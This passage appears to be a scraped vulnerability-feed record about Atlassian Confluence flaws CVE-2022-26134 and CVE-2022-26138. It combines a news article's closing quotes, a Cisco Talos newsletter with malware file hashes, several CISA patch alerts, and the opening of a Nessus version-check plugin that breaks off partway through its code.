internal networks, and then proceed from there to unleash even further damage.\n\n\u201cConfluence instances often contain a wealth of user data and business-critical information that is valuable for attackers moving laterally within internal networks,\u201d Sunkavalley said.\n\nWhat\u2019s more, the vulnerability is a source-code issue, and attacks at this level \u201care some of the most effective and long reaching attacks on the IT ecosystem,\u201d observed Garret Grajek, CEO of security firm [YouAttest.](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUcpjElsOr6shryTSooYkkS1tJo6a6FxvdH5IYSQBxGNY4H_z_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxtVZHvCB0Vt7i-2Bw8BIBLgZxGqzVWH-2B5yvKoY-2FpPXxD7KFogqV9a0rRV2rH4Hj2p6StEDVbzSc-2FkJf66Q9LkeRnRg9qfA-2Fm-2FP06VV5XsA8rTwU9DmqJ3uYX6CQKoNXRKL350M-2FNS011olthdA2Jkl3v0-3D>)\n\nThe now-infamous [Solarwinds supply-chain attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that started in December 2020 and extended well [into 2021](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) was an example of the level of damage and magnitude of threat that embedded malware can have, and the Confluence bug has the potential to create a similar scenario, he said.\n\n\u201cBy attacking the source code base the hackers are able to manipulate the code to become, in fact, agents of the hacking enterprise, cryptographically registered as legitimate components on the IT system,\u201d Grajek said.\n\nFor this reason, it\u2019s \u201cimperative that enterprises review their code and most importantly the identities that have control of the source system, like Atlassian, to ensure restrictive and legitimate access to their vital code bases,\u201d he asserted.\n", "cvss3": {}, "published": "2022-06-07T11:21:47", "type": "threatpost", "title": "Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T11:21:47", "id": "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "href": "https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2022-08-04T19:59:46", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAfter what seems like forever and honestly has been a really long time, we\u2019re heading back to BlackHat in-person this year. We\u2019re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security. \n\n \n\n\nThroughout the two days of the main conference, we\u2019ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it\u2019s probably worthwhile running through all the cool stuff we\u2019ll have going on at Hacker Summer Camp. \n\n \n\n\nOur [booth should be easy enough to find](<https://www.expocad.com/host/fx/ubm/22bhusa/exfx.html>) \u2014 it\u2019s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you\u2019ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturn of Roe vs. Wade. Attendees who watch a lightning talk can grab a never-before-seen [Snort 3](<https://snort.org/snort3>)-themed Snorty and our malware mascot stickers, which were a [big hit at Cisco Live this year](<https://twitter.com/TalosSecurity/status/1536821931097305088>). \n\n \n\n\nWe\u2019ll also be over at the Career Center if you want to [come work with us](<https://talosintelligence.com/careers>). Or even if you don\u2019t, word on the street is there\u2019ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. \n\n \n\n\nIf you want more in-depth talks, we\u2019ll have five sponsored sessions between the 10th and 11th. If you want the latest schedule and location on those talks, be sure to [follow us on Twitter](<https://twitter.com/TalosSecurity>) or check out Cisco\u2019s BlackHat event page [here](<https://www.cisco.com/c/en/us/products/security/black-hat-usa.html>). Our sponsored talks cover Talos\u2019 latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. \n\n \n\n\nAnd if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. \n\n \n\n\nFor anyone sticking around for DEF CON, we\u2019ll also have a presence there with Blue Team Village. Drop any questions in the [Blue Team Village Discord](<https://www.blueteamvillage.org/>) for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 \u2013 11 p.m. local time. \n\n \n\n\nTo stay up to date on all things Talos at both conferences, be sure to follow us on social media. - \n\n\n \n\n## The one big thing \n\n> \n\n\nCisco Talos recently discovered [a new attack framework called \"Manjusaka\"](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) being used in the wild that could be the next evolution of Cobalt Strike \u2014 and is even advertised as so. This framework is advertised as an imitation of the Cobalt Strike framework. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. \n\n\n> ### Why do I care? \n> \n> Our researchers discovered a fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, that\u2019s freely available and can generate new implants with custom configurations with ease. This increases the likelihood of wider adoption of this framework by malicious actors. If you\u2019re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used out there, it\u2019s safe to assume any evolution of it is going to draw some interest. \n> \n> ### So now what? \n> \n> Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka. \n\n> \n> \n\n## Other news of note\n\n \n\n\nEverything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country this week. She was the U.S.\u2019 highest-ranking official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi\u2019s actions and launched several kinetic warfare exercises. ([Reuters](<https://www.reuters.com/technology/7-11s-train-stations-cyber-attacks-plague-taiwan-over-pelosi-visit-2022-08-04/>), [Washington Post](<https://www.washingtonpost.com/politics/2022/08/03/those-pelosi-inspired-cyberattacks-taiwan-probably-werent-all-they-were-cracked-up-be/>)) \n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch for the issue under CISA\u2019s new guidance. ([Dark Reading](<https://www.darkreading.com/cloud/patch-now-atlassian-confluence-bug-active-exploit>), [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-confluence-bug-exploited-in-attacks/>)) \n\nNorth Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to its arsenal. The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users\u2019 Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country\u2019s weapons program. ([Ars Technica](<https://arstechnica.com/information-technology/2022/08/north-korea-backed-hackers-have-a-clever-way-to-read-your-gmail/>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-01/north-koreans-suspected-of-using-fake-resumes-to-steal-crypto>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #106: The top attacker trends from the past quarter](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/106>)_\n * _[Beers with Talos Ep. #124: There's no such thing as \"I have nothing to hide\"](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/124>)_\n * _[BlackHat \u2014 A poem](<https://blog.talosintelligence.com/2022/08/poems-0xCCd.html>)_\n * _[Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution](<https://blog.talosintelligence.com/2022/05/vuln-spotlight-alyac-est.html>)_\n * _[Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities](<https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html>)_\n * _[Researcher Spotlight: You should have been listening to Lurene Grenier years ago](<https://blog.talosintelligence.com/2022/08/researcher-spotlight-you-should-have.html>)_\n * _[Manjusaka, a new attack tool similar to Sliver and Cobalt Strike](<https://securityaffairs.co/wordpress/133953/hacking/manjusaka-attack-tool.html>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S.A 2022 **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n_[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) _**(Aug. 10 - 12, 2022)** \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 25, 2022)**\n\nVirtual \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256:** [f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121](<https://www.virustotal.com/gui/file/f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121/details>) \n\n**MD5:** 9066dff68c1d66a6d5f9f2904359876c \n\n**Typical Filename:** dota-15_id3622928ids1s.exe \n\n**Claimed Product:** N/A \n\n**Detection Name:** W32.F21B040F7C.in12.Talos \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) \n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe ** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 4, 2022) \u2014 BlackHat 2022 preview", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T18:00:00", "id": "TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-4-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-05T13:56:42", "description": "Atlassian has released a security advisory to address a vulnerability (CVE-2022-26138) affecting Questions for Confluence App. An attacker could exploit this vulnerability to obtain sensitive information. Atlassian reports that the vulnerability is likely to be exploited in the wild.\n\nCISA encourages users and administrators to review Atlassian\u2019s security advisory, [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), and apply the necessary updates immediately. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Questions for Confluence App, CVE-2022-26138", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-22T00:00:00", "id": "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-17T16:33:16", "description": "The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential vulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version number. This plugin will only run in 'Parnoid' scans.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-08T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-79483.NASL", "href": "https://www.tenable.com/plugins/nessus/163327", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163327);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/08\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Atlassian Confluence host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x <\n7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential\nvulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in\nthe confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated\nattacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content\naccessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35,\nand 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version\nnumber. This plugin will only run in 'Parnoid' scans.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79483\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.6, 7.14.3, 7.15.2, 7.16.4, 7.17.2, 7.13.6, 7.14.3, 7.15.2, 7.16.4,\n7.17.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\n# The vuln is in the Questions for Confluence app, not Confluence itself\n# We cannot determin if this is installed and/or the offending user account is present\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'Confluence', app_info.version);\n\nvar constraints = [\n { 'fixed_version' : '7.4.17', 'fixed_display' : '7.4.17 / 7.13.6 / 7.14.3 / 7.15.2 / 7.16.4 / 7.17.2' },\n { 'min_version' : '7.13.0', 'fixed_version' : '7.13.6' },\n { 'min_version' : '7.14.0', 'fixed_version' : '7.14.3' },\n { 'min_version' : '7.15.0', 'fixed_version' : '7.15.2' },\n { 'min_version' : '7.16.0', 'fixed_version' : '7.16.4' },\n { 'min_version' : '7.17.0', 'fixed_version' : '7.17.2' 